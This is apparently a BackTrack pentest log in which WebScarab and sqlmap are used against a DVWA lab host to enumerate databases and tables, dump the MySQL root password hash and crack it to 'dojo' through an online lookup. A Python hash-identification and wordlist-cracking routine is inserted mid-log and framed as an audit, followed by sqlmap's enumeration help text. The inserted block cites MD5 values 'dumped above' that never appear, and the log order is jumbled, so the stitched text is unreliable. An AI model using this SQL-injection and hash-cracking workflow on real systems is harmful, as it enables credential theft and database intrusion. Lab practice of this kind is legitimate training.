root@bt:/pentest/web/webscarab# java -jar webscarab-one-20110329-1330.jar
root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab1111.tmp/conversations
root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab0087.tmp/conversations --users --passwords --tables --dbs --level=2 --risk=1 --scope=^IP-Address$
[02:35:19] [WARNING] no clear password(s) found
database management system users password hashes:
[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
Note: you can also look the hash up on online hash-lookup sites.
MySQL 4.1 and later use SHA-1 for password hashes.
http://www.md5decrypter.co.uk/sha1-decrypt.aspx
263027ecc84aa7b81ea86b0ebecafe20bc8804fc = dojo
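The two hash methods sqlmap names in these runs ('md5_generic_passwd' for dvwa.users.password and 'mysql_passwd' for the MySQL accounts) can be checked without the tool. The following is an added example, not sqlmap's code: it recognises both formats, builds the MySQL 4.1+ hash (SHA-1 applied twice with a '*' prefix) and runs a short wordlist with common suffixes over a dump to flag accounts that need a reset and a move to a salted slow KDF; the user names, wordlist and bcrypt placeholder are constructed, and the MD5 values are the ones sqlmap dumped above.

```python
import hashlib
import re

MD5_RE = re.compile(r"^[0-9a-f]{32}$", re.I)        # sqlmap: md5_generic_passwd
MYSQL41_RE = re.compile(r"^\*[0-9A-F]{40}$", re.I)  # sqlmap: mysql_passwd

def md5_hash(password):
    """Unsalted MD5, the scheme dvwa.users.password uses."""
    return hashlib.md5(password.encode()).hexdigest()

def mysql41_hash(password):
    """MySQL 4.1+ PASSWORD(): '*' followed by SHA1(SHA1(password)) in upper-case
    hex. No salt, so equal passwords hash identically on every server."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

HASHERS = {"md5_generic_passwd": md5_hash, "mysql_passwd": mysql41_hash}

def identify(stored):
    """Name the hash method the way sqlmap's prompt does, or None if unknown."""
    if MYSQL41_RE.match(stored):
        return "mysql_passwd"
    if MD5_RE.match(stored):
        return "md5_generic_passwd"
    return None

def candidates(word, suffixes):
    """The base word plus the 'common password suffixes' variants."""
    yield word
    for s in suffixes:
        yield word + s

def audit(rows, wordlist, suffixes=("1", "123", "!")):
    """rows: (user, stored_hash) pairs from a dump. One dict per row; method
    None means the value is not a fast unsalted hash and is skipped."""
    report = []
    for user, stored in rows:
        method = identify(stored)
        recovered = None
        if method is not None:
            hasher = HASHERS[method]
            for word in wordlist:
                for cand in candidates(word, suffixes):
                    if hasher(cand).lower() == stored.lower():
                        recovered = cand
                        break
                if recovered is not None:
                    break
        report.append({"user": user, "method": method, "recovered": recovered})
    return report

def weak_accounts(report):
    """Users whose stored hash fell to the wordlist: reset them and migrate the
    scheme to a salted slow KDF (bcrypt/scrypt/argon2)."""
    return [r["user"] for r in report if r["recovered"] is not None]

# Constructed sample: two MD5 values sqlmap dumped from dvwa.users above, one
# suffixed variant, a MySQL 4.1 hash computed locally for 'dojo', one strong
# MySQL password that survives, and a bcrypt-style placeholder to be skipped.
WORDLIST = ["password", "letmein", "dojo", "abc123", "charley", "qwerty"]
SAMPLE_ROWS = [
    ("admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    ("pablo", "0d107d09f5bbe40cade3de5c71e9e9b7"),
    ("gordonb", md5_hash("qwerty123")),
    ("root@localhost", mysql41_hash("dojo")),
    ("svc_backup", mysql41_hash("3Qk!v9-wpZ#Lm7r")),
    ("modern_app", "$2y$10$placeholder-bcrypt-value"),
]
```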
[02:35:19] [INFO] fetching database names
[02:35:19] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test
[02:35:19] [INFO] fetching tables for databases: w3af_test, dvwa, information_schema, mysql
Database: w3af_test
[2 tables]
+---------------------------------------+
| customers |
| users |
+---------------------------------------+
Database: dvwa
[2 tables]
+---------------------------------------+
| guestbook |
| users |
+---------------------------------------+
[02:35:20] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| avatar | varchar(70) |
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user | varchar(15) |
| user_id | int(6) |
+------------+-------------+
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements.
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
--search Search column(s), table(s) and/or database name(s)
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--first=FIRSTCHAR First query output word character to retrieve
--last=LASTCHAR Last query output word character to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell